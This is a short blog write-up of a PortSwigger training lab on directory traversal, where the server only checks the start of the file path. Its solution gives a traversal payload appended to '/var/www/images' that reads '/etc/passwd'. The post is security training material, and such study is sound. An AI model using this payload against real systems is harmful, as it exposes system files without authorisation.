PortSwigger - Directory Traversal - Lab 5

Posted Jun 10, 2024 Updated Oct 26, 2024

By Jaco Zwarts 1 min read

Lab 5 - Directory Traversal - File path traversal, validation of start of path

Lab Objective:

This lab contains a path traversal vulnerability in the display of product images. The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.

To solve the lab, retrieve the contents of the /etc/passwd file.

Reference:
Port Swigger - Lab 5
Rana Khalil - Lab 5

Solution

1. Investigate client default request and notice `/var/www/images` is appended to each image request.

2. Append our payload after `/var/www/images`

../../../../etc/passwd
/var/www/images/../../../../etc/passwd

directory-traversal bscp

This post is licensed under CC BY 4.0 by the author.

Trending Tags

bscp authentication cbbh directory-traversal command-injection business-logic-vulnerability checklist recon brute-forcing file-upload-attacks